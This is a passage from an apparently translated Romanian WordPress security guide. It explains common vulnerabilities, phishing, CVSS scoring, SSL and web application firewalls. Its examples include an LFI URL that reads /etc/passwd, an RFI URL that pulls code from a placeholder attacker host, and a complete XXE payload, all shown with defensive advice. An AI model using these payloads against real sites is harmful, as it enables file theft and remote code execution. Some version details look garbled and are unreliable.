Un atacator ar putea furniza un parametru matrice pentru meta utilizator wp_capabilities care definește rolul unui utilizator. În timpul procesului de înregistrare, detaliile de înregistrare trimise au fost transmise funcției update_profile și orice metadate respective care au fost trimise, indiferent de ceea ce a fost trimis, vor fi actualizate pentru acel utilizator nou înregistrat.

Vulnerabilitatea a permis în esență unui nou utilizator să solicite administratorului atunci când se înregistrează.

Cum să preveniți escaladarea privilegiilor

iThemes Security Pro vă poate ajuta să vă protejați site-ul împotriva controlului de acces întrerupt, restricționând accesul administratorului la o listă de dispozitive de încredere.

11. Vulnerabilitate la executarea codului la distanță

O vulnerabilitate RCE sau Remote Code Execution permite unui atacator să acceseze și să facă modificări și chiar să preia un computer sau server.

Exemplu de executare cod la distanță

În 2018, Microsoft a dezvăluit o vulnerabilitate la executarea codului la distanță găsită în Excel.

Un atacator care a exploatat cu succes vulnerabilitatea ar putea rula cod arbitrar în contextul utilizatorului actual. Dacă utilizatorul actual este conectat cu drepturi de utilizator administrative, un atacator ar putea prelua controlul sistemului afectat. Un atacator ar putea apoi să instaleze programe; vizualizați, modificați sau ștergeți date; sau creați conturi noi cu drepturi de utilizator complete. Utilizatorii ale căror conturi sunt configurate pentru a avea mai puține drepturi de utilizator pe sistem ar putea fi mai puțin afectați decât utilizatorii care operează cu drepturi de utilizator administrative.

Cum să preveniți executarea codului la distanță

Cel mai simplu mod de a atenua împotriva unei vulnerabilități RCE este de a valida datele introduse de utilizator prin filtrarea și eliminarea oricăror caractere nedorite.

Compania noastră mamă Liquid Web are un articol minunat despre prevenirea executării codului de la distanță.

14. Vulnerabilitate la includerea fișierelor

O vulnerabilitate de includere a fișierelor apare atunci când o aplicație web permite utilizatorului să trimită date în fișiere sau să încarce fișiere pe server.

Există două tipuri de vulnerabilități de includere a fișierelor, Local și Remote.

15. Vulnerabilitate la includerea fișierelor locale

O vulnerabilitate LFI sau Local File Inclusion permite unui atacator să citească și uneori să execute fișiere pe serverul unui site web.

Exemplu de includere a fișierelor locale

Să aruncăm o altă privire la yourfavesite.com , unde căile trecute pentru a include declarații nu sunt igienizate corespunzător. De exemplu, să aruncăm o privire la adresa URL de mai jos.

 yourfavesite.com/module.php?file=example.file

Este posibil ca un atacator să schimbe parametrul URL pentru a accesa un fișier arbitrar de pe server.

 yourfavesite.com/module.php?file=etc/passwd

Modificarea valorii fișierului în adresa URL ar putea permite unui atacator să vizualizeze conținutul fișierului psswd.

Cum să preveniți includerea fișierelor locale

Creați o listă permisă de fișiere pe care pagina le poate include, apoi utilizați un identificator pentru a accesa fișierul selectat. Și apoi blocați orice cerere care conține un identificator nevalid.

16. Vulnerabilitate la includerea fișierelor la distanță

O vulnerabilitate RFI sau Remote File Inclusion permite unui atacator să includă un fișier, exploatând de obicei mecanismele de „includere dinamică a fișierelor” implementate în aplicația țintă.

Exemplu de includere a fișierelor la distanță

WordPress Plugin WP cu Spritz a fost închis în depozitul WordPress.org deoarece avea o vulnerabilitate RFI.

Mai jos este codul sursă al vulnerabilității:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

Codul poate fi exploatat modificând valoarea content.filter.php?url= value. De exemplu:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Prevenirea incluziunii la distanță a fișierelor

Creați o listă permisă de fișiere pe care pagina le poate include, apoi utilizați un identificator pentru a accesa fișierul selectat. Și apoi blocați orice cerere care conține un identificator nevalid.

17. Vulnerabilitatea transversală a directorului

O vulnerabilitate Directory Traversal sau File Traversal permite unui atacator să citească fișiere arbitrare pe serverul care rulează o aplicație.

Exemplu de traversare a directorului

Versiunile WordPress 5.7 - 5.03 au fost vulnerabile la atacurile de traversare a directorului, deoarece nu au reușit să verifice corect datele de intrare ale utilizatorilor. Un atacator cu acces la un cont cu cel puțin privilegii de author ar putea exploata vulnerabilitatea traversării directorului și ar putea executa cod PHP rău intenționat pe serverul de bază, ducând la o preluare completă de la distanță.

Cum se previne traversarea directorului

Dezvoltatorii pot utiliza indici mai degrabă decât porțiuni reale ale numelor de fișiere atunci când șablonează sau folosesc fișiere de limbă.

18. Vulnerabilitate de redirecționare rău intenționată

O vulnerabilitate de redirecționare rău intenționată permite unui atacator să injecteze cod pentru a redirecționa vizitatorii site-ului către un alt site web.

Exemplu de redirecționare rău intenționată

Să presupunem că sunteți în căutarea unui pulover albastru folosind instrumentul de căutare dintr-un butic online.

Din păcate, serverul buticului nu reușește să codeze datele introduse de utilizator în mod corespunzător, iar un atacator a reușit să injecteze un script de redirecționare rău intenționat în interogarea dvs. de căutare.

Deci, când introduceți pulover albastru în câmpul de căutare al buticului și apăsați pe Enter, ajungeți pe pagina web a atacatorului în loc de pagina buticului, cu pulovere care se potrivesc cu descrierea căutării dvs.

Cum să preveniți redirecționarea rău intenționată

Vă puteți proteja împotriva redirecționărilor rău intenționate, igienizând datele introduse de utilizatori, validând adresele URL și obținând confirmarea vizitatorului pentru toate redirecționările în afara site-ului.

19. Vulnerabilitatea entității externe XML

O vulnerabilitate a entității externe XXE sau XML permite unui atacator să păcălească un analizor XML pentru a transmite informații sensibile unei entități externe aflate sub controlul lor.

Exemplu de entitate externă XML

Un atacator ar putea exploata o vulnerabilitate XXE pentru a avea acces la fișiere sensibile, cum ar fi etc / passwd, care stochează informații despre contul utilizatorului.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Cum să preveniți entitatea externă XML

Cel mai bun mod de a preveni XXE este de a utiliza formate de date mai puțin complexe, cum ar fi JSON și de a evita serializarea datelor sensibile.

20. Atacul refuzului de serviciu

Un atac DoS sau Denial-of-Service este o încercare deliberată de a face site-ul sau aplicația dvs. indisponibil pentru utilizatori, inundându-l cu trafic de rețea.

Într-un atac DDoS Distributed Denial of Service, un atacator folosește mai multe surse pentru a inunda o rețea cu trafic. Un atacator va deturna grupuri de computere, routere și dispozitive IoT infectate cu malware, pentru a crește fluxul de trafic.

Exemplu de atac de negare a serviciului

Cel mai mare atac DDoS (Distributed Denial-of-Service) a fost impus împotriva AWS în februarie a acestui an. Amazon a raportat că AWS Shield, serviciul lor de protecție împotriva amenințărilor, a observat și atenuat acest imens atac DDoS. Atacul a durat 3 zile și a atins un maxim de 2,3 Terabytes pe secundă.

Cum să preveniți atacul prin refuz de serviciu

Există 2 moduri principale de a atenua un atac DoS.

1. Achiziționați mai multe găzduiri decât aveți nevoie. Dacă aveți la dispoziție resurse suplimentare, vă puteți ajuta să rezistați cererii crescute cauzate de un atac DoS.
2. Folosiți un firewall la nivel de server precum Cloudflare. Un firewall poate detecta o creștere neobișnuită a traficului și poate împiedica supraîncărcarea site-ului dvs. web.

21. Înregistrare tastare

Înregistrarea tastării , cunoscută și sub numele de tastare sau captare de tastatură, are loc atunci când un hacker monitorizează și înregistrează în mod ascuns tastele vizitatorilor site-ului.

Exemplu de înregistrare a tastelor

În 2017, un hacker a instalat cu succes JavaScript rău intenționat pe serverul producătorului de smartphone-uri OnePlus.

Folosind codul rău intenționat, atacatorii au monitorizat și înregistrat apăsările tastelor clienților OnePlus în timp ce își introduceau datele cardului de credit. Hackerii au înregistrat și au colectat tastele a 40.000 de clienți înainte ca OnePlus să detecteze și să corecționeze hack-ul.

Cum să preveniți înregistrarea prin tastare

Actualizați totul! De obicei, un atacator va trebui să exploateze o altă vulnerabilitate existentă pentru a injecta un keylogger pe un computer sau server. Păstrarea tuturor actualizărilor cu cele mai recente patch-uri de securitate va împiedica hackerii o modalitate simplă de a instala un keylogger pe site-ul sau computerul dvs.

Bonus: Phishing

Vulnerabilitățile software sunt singurul lucru pe care încearcă să-l exploateze hackerii și criminalii cibernetici. Hackerii vizează și exploatează și oamenii. O metodă comună de exploatare este Phishingul.

Ce este Phishingul?

Phishingul este o metodă de atac cibernetic care utilizează e-mail, rețele sociale, mesaje text și apeluri telefonice pentru a păcăli victima să renunțe la informații personale. Atacatorul va folosi apoi informațiile pentru a accesa conturile personale sau pentru a comite fraude de identitate.

Cum să identificați un e-mail de phishing

După cum am aflat mai devreme în această postare, unele vulnerabilități necesită un anumit tip de interacțiune cu utilizatorul pentru a fi exploatate. O modalitate prin care un hacker îi păcălește pe oameni să participe la eforturile lor nefaste este prin trimiterea de e-mailuri de phishing.

Învățarea modului de a identifica un e-mail de phishing vă poate scuti de jocul involuntar în planurile criminalilor cibernetici.

4 sfaturi pentru a identifica un e-mail de phishing :

1. Uitați-vă la adresa de e-mail - Dacă primiți un e-mail de la o companie, porțiunea din adresa de e-mail a expeditorului după „@” trebuie să se potrivească cu numele companiei.
   
   Dacă un e-mail reprezintă o companie sau o entitate guvernamentală, dar folosește o adresă de e-mail publică precum „@gmail”, este un semn al unui e-mail de phishing.
   
   Fii atent la ortografiile subtile ale numelui de domeniu. De exemplu, să ne uităm la această adresă de e-mail [e-mail protejat] Putem vedea că Netflix are un „x” suplimentar la final. Ortografia greșită este un semn clar că e-mailul a fost trimis de un escroc și ar trebui șters imediat.
   
2. Căutați erori gramaticale - Un e-mail plin de greșeli gramaticale este semnul unui e-mail rău intenționat. Toate cuvintele pot fi scrise corect, dar din propoziții lipsesc cuvinte care ar face propoziția coerentă. De exemplu, „Contul dvs. a fost piratat. Actualizați parola pentru securitatea contului ”.
   
   Toată lumea face greșeli și nu fiecare e-mail cu o greșeală sau două este o încercare de a vă înșela. Cu toate acestea, erorile gramaticale multiple justifică o privire mai atentă înainte de a răspunde.
   
3. Atașamente sau linkuri suspecte - Merită să faceți o pauză pentru un moment înainte de a interacționa cu orice atașamente sau linkuri incluse într-un e-mail.
   
   Dacă nu recunoașteți expeditorul unui e-mail, nu ar trebui să descărcați atașamentele incluse în e-mail, deoarece acesta ar putea conține programe malware și vă poate infecta computerul. În cazul în care e-mailul pretinde că provine dintr-o companie, puteți să le informați Google despre informațiile de contact pentru a verifica dacă e-mailul a fost trimis de la acestea înainte de a deschide atașamente.
   
   Dacă un e-mail conține un link, puteți trece cu mouse-ul peste link pentru a verifica dacă adresa URL vă trimite unde ar trebui să fie.
   
4. Aveți grijă la solicitările urgente - Un truc obișnuit folosit de escroci este de a crea un sentiment de urgență. Un e-mail rău intenționat poate produce un scenariu care necesită acțiuni imediate. Cu cât aveți mai mult timp să vă gândiți, cu atât sunt mai mari șansele de a identifica cererea unui escroc.
   
   Este posibil să primiți un e-mail de la „șeful” dvs. prin care să vă solicite să plătiți un furnizor cât mai curând sau de la banca dvs. prin care să vă informați că contul dvs. a fost spart și că sunt necesare acțiuni imediate.

Cum se măsoară severitatea unei vulnerabilități WordPress

Există mai multe tipuri de vulnerabilități WordPress, toate cu diferite grade de risc. Din fericire pentru noi, baza de date națională a vulnerabilităților - un proiect al Institutului Național de Știință și Tehnologie - are un calculator de sistem de notare a vulnerabilității pentru a determina riscul unei vulnerabilități.

Această secțiune a ghidului de vulnerabilitate WordPress va acoperi valorile și nivelurile de severitate ale sistemului de notare a vulnerabilității. Deși această secțiune este destul de tehnică, unii utilizatori ar putea fi utilă pentru aprofundarea înțelegerii modului în care sunt evaluate vulnerabilitățile WordPress și severitatea lor.

Valori comune ale sistemului de notare a vulnerabilității WordPress

Ecuația sistemului de notare a vulnerabilității folosește trei seturi diferite de scoruri pentru a determina scorul general de severitate.

1. Valori de bază

Grupul metric de bază reprezintă caracteristicile unei vulnerabilități care sunt constante în mediile utilizatorilor.

Valorile de bază sunt împărțite în două grupuri, exploatabilitate și impact.

1.1. Valori de exploatare

Scorul de exploatabilitate se bazează pe cât de dificil este pentru un atacator să profite de vulnerabilitate. Scorul este calculat folosind 5 variabile diferite.

1.1.1. Vector de atac (AV)

Scorul vectorului de atac se bazează pe metoda în care este exploatată vulnerabilitatea. Scorul va fi mai mare cu cât un atacator poate fi mai îndepărtat pentru a exploata vulnerabilitatea.

Ideea este că numărul potențialilor atacatori va fi mult mai mare dacă vulnerabilitatea poate fi exploatată printr-o rețea în comparație cu o vulnerabilitate care necesită acces fizic la un dispozitiv exploatat.

Cu cât există mai mulți potențiali atacatori, cu atât este mai mare riscul de exploatare și, prin urmare, scorul Vectorului de atac acordat vulnerabilității va fi mai mare.

1.1.2. Complexitatea atacului (AC)

Valoarea complexității se bazează pe condițiile necesare pentru a exploata vulnerabilitatea. Unele condiții pot necesita colectarea mai multor informații despre țintă, prezența anumitor setări de configurare a sistemului sau excepții de calcul.

Scorul de complexitate al atacului va fi mai mare cu cât complexitatea necesară pentru exploatarea vulnerabilității este mai mică.

1.1.3. Privilegii necesare (PR)

Scorul privilegiilor necesare este calculat pe baza privilegiilor pe care trebuie să le obțină un atacator înainte de a exploata o vulnerabilitate. Ne vom scufunda puțin mai mult în secțiunea autentificat vs. neautentificat.

Scorul va fi cel mai mare dacă nu sunt necesare privilegii.

1.1.4. Interacțiunea cu utilizatorul (UI)

Scorul de interacțiune cu utilizatorul este determinat pe baza faptului dacă o vulnerabilitate necesită sau nu interacțiunea cu utilizatorul pentru a fi exploatată.

Scorul va fi cel mai mare atunci când nu este necesară interacțiunea cu utilizatorul pentru ca un atacator să exploateze vulnerabilitatea.

1.1.5. Domeniul de aplicare

Scorul scopului se bazează pe o vulnerabilitate într-o componentă software pentru a avea impact asupra resurselor dincolo de sfera sa de securitate.

Domeniul de securitate cuprinde alte componente care oferă funcționalitate numai acelei componente, chiar dacă aceste alte componente au propria autoritate de securitate.

Scorul este cel mai mare atunci când are loc o modificare a domeniului.

1.2. Valori de impact

Măsurile de impact surprind efectele directe ale unei vulnerabilități exploatate cu succes.

1.2.1. Impact confidențial (C)

Acest scor de impact confidențial măsoară impactul asupra confidențialității informațiilor gestionate de software-ul exploatat.

Scorul este cel mai mare atunci când pierderea pentru software-ul afectat este mai mare.

1.2.2. Integritate (I)

Acest scor de integritate se bazează pe impactul asupra integrității unei vulnerabilități exploatate cu succes.

Scorul este cel mai mare atunci când consecința software-ului afectat este mai mare.

1.2.3. Disponibilitate (A)

Scorul de disponibilitate se bazează pe impactul disponibilității software-ului exploatat.

Scorul este cel mai mare atunci când consecința componentei afectate este mai mare.

Scorul de bază Calculul scorului CVSS

Scorul de bază este o funcție a ecuațiilor de scor de impact și exploatabilitate. Unde scorul de bază este definit ca,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Valori ale scorului temporal

Metricele temporale măsoară starea actuală a tehnicilor de exploatare, existența oricăror patch-uri sau soluții sau încrederea pe care o avem în descrierea unei vulnerabilități.

Se așteaptă ca valorile temporale să se schimbe în timp.

2.1. Maturitatea codului de exploatare (E)

Maturitatea codului de exploatare se bazează pe probabilitatea ca vulnerabilitatea să fie atacată.

Cu cât o vulnerabilitate poate fi exploatată mai ușor, cu atât scorul de vulnerabilitate este mai mare.

2.2. Nivelul de remediere (RL)

Nivelul de remediere al unei vulnerabilități este un factor important pentru stabilirea priorităților. Soluțiile alternative sau remedierile rapide pot oferi remedieri intermediare până la emiterea unui patch sau upgrade oficial.

Cu cât o soluție este mai puțin oficială și permanentă, cu atât scorul de vulnerabilitate este mai mare.

2.3. Raportează încrederea (RC)

Metrica Raportului de încredere măsoară nivelul de încredere că există o vulnerabilitate și credibilitatea detaliilor tehnice.

Cu cât o vulnerabilitate este validată de furnizor sau de alte surse de încredere, cu atât scorul este mai mare.

Calculul scorului CVSS temporar

Scorul temporal este definit ca,

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Valori de scor mediu

Metricele de mediu permit analiștilor să personalizeze CVSS notat pe baza importanței activelor IT afectate.

Valorile de exploatare a mediului și impactul sunt un echivalent modificat al valorilor de bază și li se atribuie valori pe baza plasării componentelor infrastructurii organizaționale. Consultați secțiunile Metrici de bază de mai sus pentru a vizualiza valorile și descrierile valorilor de exploatare și impact.

Valorile de mediu conțin un grup suplimentar, Impact Subscore Modifiers.

3.1. Valori ale modificatorilor de abonament la impact

Metricele Impact Subscore Modifiers evaluează cerințele specifice de securitate pentru confidențialitate (CR), integritate (IR) și disponibilitate (AR), permițând ca scorul de mediu să fie ajustat în funcție de mediul utilizatorilor.

Calculul scorului CVSS de mediu

Scorul de mediu este definit ca,

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Scorul CVSS general și severitatea

Scorul general al sistemului de notare a vulnerabilității comune sau scorul CVSS este o reprezentare a scorurilor de bază, temporale și de mediu.

Scorul general CVSS poate fi folosit pentru a vă face o idee despre cât de gravă sau gravă este o vulnerabilitate.

Exemplu de evaluare a severității CVSS în lumea reală

În Buletinul nostru de vulnerabilități din decembrie 2020, am raportat o vulnerabilitate în pluginul Easy WP SMTP. Vulnerabilitatea zero-day (vom acoperi vulnerabilitățile zero-day în secțiunea următoare) a permis unui atacator să preia controlul unui cont de administrator și a fost exploatat în sălbăticie.

Aruncând o privire la intrarea în baza de date a vulnerabilității naționale, putem găsi gradul de severitate al vulnerabilității WP SMTP.

Să prezentăm câteva lucruri din captura de ecran WP SMTP NVDB de mai sus.

Scorul de bază : scorul de bază este de 7,5, ceea ce ne spune că gradul de severitate al vulnerabilității este ridicat.

Vector : vectorul ne spune că scorul se bazează pe ecuațiile de vulnerabilitate CVSS 3.1 și pe valorile utilizate pentru a calcula scorul.

Iată porțiunea de măsurare a vectorului.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Acum, să folosim valorile metrice de bază și descrierile de mai sus din acest post pentru a înțelege cele opt valori metrice ale vectorului.

1. AV: N - Aceasta înseamnă că Vectorul de atac (AV) al vulnerabilității este Rețeaua (N). Cu alte cuvinte, un atacator are nevoie doar de acces la rețea pentru a exploata vulnerabilitatea.
2. AC: L - Complexitatea de atac (AC) a vulnerabilității este scăzută (L). Cu alte cuvinte, orice script pentru copii poate exploata vulnerabilitatea.
3. PR: N - Privilegiile necesare (PR) necesare pentru a exploata vulnerabilitatea este Nici unul (N). Deci, vulnerabilitatea nu necesită exploatarea unui utilizator autentificat. (Vom acoperi diferența dintre vulnerabilitățile autentificate și neautentificate mai târziu în această postare.)
4. UI: N - Interacțiunea cu utilizatorul (UI) necesară pentru a exploata această vulnerabilitate este Niciuna (N). Deci, atacatorul are mijloacele de a exploata singur vulnerabilitatea.
5. S: U - Aceasta înseamnă că domeniul de aplicare (S) al vulnerabilității este neschimbat (U). În cazul acestei vulnerabilități, componenta vulnerabilă și componenta afectată sunt aceleași.
6. C: H - Impactul confidențialității (C) al vulnerabilității este ridicat (H). Atunci când această vulnerabilitate este exploatată, rezultă o pierdere totală a confidențialității.
7. I: N - Impactul de integritate (I) al acestei vulnerabilități este Nici unul (N). Atunci când vulnerabilitatea este exploatată, nu există pierderi de integritate sau de încredere a informațiilor vulnerabile.
8. A: N - Aceasta înseamnă că Impactul Disponibilității (A) este Nici unul (N). Atunci când vulnerabilitatea este exploatată, nu va exista niciun impact asupra disponibilității site-ului dvs. web.

Scorul CVSS ne poate ajuta să determinăm severitatea și scopul oricărei vulnerabilități date. În următoarele câteva secțiuni, vom acoperi câțiva termeni importanți de vulnerabilitate, care sunt adesea incluși în dezvăluirile de vulnerabilitate.

Încheierea

În această secțiune, am aflat câteva elemente importante ale securității WordPress, inclusiv motivațiile hackerilor, diferitele tipuri de hack-uri, vulnerabilitățile pe care le exploatează infractorii online, cum să atenuați riscul vulnerabilităților și cum să determinați riscul pe care îl prezintă o vulnerabilitate asupra dvs. site-ul web.

Înțelegerea modului în care atacatorii încearcă să ne pirateze site-urile web și obiectivul lor după încălcarea site-urilor noastre web ne permite să construim apărarea adecvată.

În secțiunile viitoare, veți afla cum vă puteți proteja site-ul web de aproape orice tip de atac pe care un hacker îl poate arunca asupra dvs.

Secțiunea 4: Securizarea serverului dvs.

Primul pas în strategia dvs. de securitate WordPress este să vă securizați serverul. Serverul dvs. stochează toate fișierele și codul care fac ca site-ul dvs. să ruleze.

În această secțiune veți afla:

1. Importanța alegerii unei bune gazde.
2. Cum se criptează comunicațiile de pe site-ul dvs. web.
3. Cum un firewall vă poate ajuta să vă securizați site-ul.

Alegeți Gazduirea potrivită

Nu toate gazdele web sunt create egal și alegerea unuia doar pe preț poate ajunge să vă coste mult mai mult pe termen lung, cu probleme de securitate WordPress. Majoritatea mediilor de găzduire partajate sunt sigure, dar unele nu separă în mod adecvat conturile de utilizator.

Gazda dvs. ar trebui să fie vigilentă cu privire la aplicarea celor mai recente patch-uri de securitate și la respectarea celor mai bune practici importante de securitate WordPress de găzduire legate de securitatea serverului și a fișierelor. Gazda dvs. ar trebui să fie vigilentă cu privire la aplicarea celor mai recente patch-uri de securitate și la respectarea altor bune practici importante de securitate a găzduirii legate de securitatea serverului și a fișierelor.

Criptați site-ul dvs. WordPress cu SSL

Secure Sockets Layer, cunoscut și sub numele de SSL, este o tehnologie de securitate care asigură criptarea între un client și un server web. Pentru a înțelege acest lucru un pic mai simplu, un „client” este un browser web precum Chrome sau Safari, iar un „server web” este site-ul sau magazinul dvs. online.

O modalitate simplă de a afla dacă site-ul pe care îl vizitați are instalat un certificat SSL este să căutați în bara de adrese a browserului dvs. pentru a vedea dacă adresa URL începe cu HTTP sau HTTPS. Dacă adresa URL începe cu un HTTPS, navigați în siguranță pe un site folosind SSL.

De ce este SSL atât de important?

Nu aveți un certificat SSL în 2021 este scump. De ce? Dacă nu aveți SSL activat pe site-ul dvs., va fi mai greu pentru potențialii clienți să vă descopere existența, iar cei care găsesc site-ul dvs. pot fi speriați să nu vă ofere bani.

De fiecare dată când facem o achiziție online, există o comunicare între browserul dvs. și magazinul online. De exemplu, atunci când introducem numărul de card de credit în browserul nostru, browserul nostru va partaja numărul magazinului online. După ce magazinul primește plata, acesta îi spune browserului să vă anunțe că achiziția dvs. a avut succes.

Un lucru de reținut cu privire la informațiile partajate între browserul nostru și serverul magazinului este că informațiile fac mai multe opriri în tranzit. SSL furnizează criptarea comunicării pentru a ne asigura că cardul nostru de credit nu este văzut până când nu ajunge la destinația finală a serverului magazinului.

Pentru a înțelege mai bine cum funcționează criptarea, gândiți-vă la modul în care sunt livrate achizițiile noastre. Dacă ați urmărit vreodată starea de livrare a unei achiziții online, ați fi văzut că comanda dvs. a făcut mai multe opriri înainte de a ajunge la domiciliu. Dacă vânzătorul nu v-a ambalat corect achiziția, ar fi ușor pentru oameni să vadă ce ați achiziționat.

SSL este un instrument crucial în prevenirea băieților răi de a intercepta informații sensibile, cum ar fi parolele și numerele cardurilor de credit, care sunt partajate între client și serverul web.

De ce un certificat SSL este obligatoriu pentru fiecare site web?

Avantajele de securitate WordPress pe care le obțineți deținând un certificat SSL pe site-ul dvs. web sunt suficiente pentru a-l face un must-have pentru orice site web. Cu toate acestea, pentru a încuraja pe toată lumea să își protejeze vizitatorii site-ului, browserele web și motoarele de căutare au creat stimulente negative pentru a încuraja pe toată lumea să utilizeze SSL. În această secțiune, vom acoperi consecințele costisitoare ale neactivării SSL pe site-ul dvs. web.

1. Fără SSL activat vă va afecta clasamentele SEO

Optimizarea motoarelor de căutare sau SEO este procesul de optimizare a site-ului dvs. web pentru a fi descoperit organic prin intermediul paginilor cu rezultate ale motorului de căutare. Avantajul SEO este că este o modalitate excelentă pentru dvs. de a crește traficul organic și neplătit către site-ul dvs. Dacă vindeți un curs de coacere a pâinii, doriți ca site-ul dvs. web să fie pe prima pagină de rezultate pentru cineva care caută pe Google sau Duck Duck Go pentru un curs de coacere a pâinii.

Fără SSL activat pe site-ul dvs., motoarele de căutare vă vor penaliza și vă vor retrograda clasamentul. Una dintre valorile pe care Google le folosește pentru a clasifica site-urile web în rezultatele căutării este încrederea. Este în interesul Google să nu-și trimită utilizatorii pe site-uri web nesigure, astfel încât încrederea este puternic ponderată în algoritmul lor de clasare. Cu SSL adăugând atât de multă securitate, este o parte semnificativă a modului în care Google evaluează încrederea unui site web.

2. Browserele marchează site-urile non-SSL ca neconforme

O altă modalitate prin care nu aveți SSL activat vă va costa este că browserul vizitatorului dvs. îi va avertiza că site-ul dvs. nu este sigur. După cum am menționat mai devreme, după ce instalați un certificat SSL pe site-ul dvs., adresa URL a site-ului dvs. va schimba formularul http : //yourwebsite.com în https: // yourwebsite / com. Chrome, de exemplu, va marca paginile web criptate HTTPS ca fiind sigure cu un lacăt blocat. Alternativ, Chrome va înlocui lacătul blocat pentru toate paginile web necriptate HTTP cu textul Not Secure .

Nu voi face cumpărături pe site-uri web care sunt marcate ca nesigure de browserul meu și nu sunt singurul care nu o va face. Potrivit unui studiu realizat de GlobalSign, 85% dintre cumpărătorii online evită site-urile nesecurizate. Rețineți că, în 2021, este vital să aveți toate site-urile dvs. folosind HTTPS și nu doar paginile de autentificare și checkout. Este posibil ca un potențial client să nu ajungă la o plată securizată dacă paginile magazinului sunt marcate ca Necunoscute de browserul lor web.

3. Puteți pierde clienții potențiali

Protejarea clienților dvs. este motivul esențial pentru a activa SSL pe site-ul dvs. web. Dacă sunt dispuși să vă încredințeze afacerea lor, cel mai puțin pe care îl puteți face este să recompensați această încredere protejându-i cu puterea de criptare.

Dacă un hacker vă poate fura detaliile cardului de credit al clientului dvs. din cauza lipsei de criptare pe site-ul dvs. web, nu numai că veți pierde încrederea acestora, dar veți pierde orice activitate viitoare.

Cum pot spune dacă site-ul meu web a activat SSL?

O modalitate ușoară de a afla dacă site-ul dvs. are un certificat SSL instalat este să căutați în bara de adrese a browserului dvs. pentru a vedea dacă adresa URL începe cu HTTP sau HTTPS. Dacă adresa URL începe cu un HTTPS, site-ul dvs. web este securizat cu SSL.

De asemenea, puteți utiliza un verificator SSL, cum ar fi SSL Labs. Un verificator SSL va scana site-ul dvs. pentru un certificat SSL și vă va anunța când certificatul dvs. SSL este setat să expire.

Cum pot instala un certificat SSL pe site-ul meu WordPress?

Dacă site-ul dvs. WordPress lipsește SSL, primul lucru pe care ar trebui să-l faceți este să cereți furnizorului dvs. de găzduire să vadă dacă furnizează un certificat și o configurație SSL gratuite. În 2021, majoritatea companiilor de găzduire includ SSL în pachetele lor de găzduire. De exemplu, iThemes Hosting furnizează și gestionează SSL pentru fiecare site web.

Dacă gazda dvs. nu vă oferă un certificat SSL gratuit, nu vă faceți griji, există încă multe alte opțiuni.

Cloudflare oferă un certificat SSL partajat gratuit pentru site-urile web WordPress. Dacă preferați să nu aveți un certificat SSL partajat și sunteți confortabil cu linia de comandă, CertBot este o opțiune excelentă. Certbot nu numai că creează un certificat SSL gratuit folosind Let's Encrypt pentru dvs., dar va gestiona automat reînnoirea certificatului pentru dvs.

A avea SSL activat pe site-ul dvs. WordPress este o necesitate în 2021. SSL asigură comunicarea dintre dvs. și clienții dvs., vă îmbunătățește SEO-ul și oferă vizitatorilor site-ului dvs. confortul că sunt în siguranță în timp ce navighează pe site-ul dvs. web.

Utilizați un firewall pentru aplicații web

Utilizarea unui Firewall pentru aplicații web este o modalitate excelentă de a adăuga un alt strat de protecție site-ului dvs. WordPress.

Ce este un firewall pentru aplicații web?

Un paravan de protecție WAF sau Web Application vă ajută să vă securizați site-ul web, monitorizând traficul pe internet către site-ul dvs. web înainte de a ajunge pe site-ul dvs. web.

Prin adăugarea unui WAF în fața WordPress, adăugați un punct de control de securitate între internet și site-ul dvs. web. Înainte ca traficul să vă poată accesa site-ul web, acesta trebuie să treacă prin WAF.

Dacă WAF detectează traficul rău intenționat - cum ar fi CSRF, XSS, injecții SQL și multe altele - îl va filtra înainte de a ajunge vreodată pe site-ul dvs. web. Nu numai asta, dar un WAF vă poate ajuta să detectați un atac DDoS și să implementați limitarea ratei pentru a preveni blocarea site-ului dvs. web.

Cele 3 moduri de a implementa un WAF

Există 3 moduri diferite de a implementa un WAF. Să aruncăm o privire la avantajele și dezavantajele pentru fiecare tip.

1. WAF bazat pe rețea - Un WAF bazat pe rețea sau fizic este bazat pe hardware. Principalul pro al unui WAF bazat pe rețea este latența redusă care vine de la instalarea locală. Totuși, conul provine din prețul depozitării și întreținerii echipamentelor fizice. Prețul și cerințele de stocare fizică fac din aceasta o alegere slabă pentru majoritatea oamenilor.
2. WAF bazat pe gazdă - Un WAF bazat pe gazdă sau local este integrat în WordPress, folosind de obicei un plugin. Pro al unui WAF bazat pe gazdă este că este mai puțin costisitor decât un WAF bazat pe rețea. Conectarea la un WAF local este cerințele resurselor serverului dvs. Și odată cu filtrarea traficului care se întâmplă pe site-ul dvs. web, acesta poate duce la timpi de încărcare a paginii mai liniști pentru vizitatorii site-ului dvs. web.
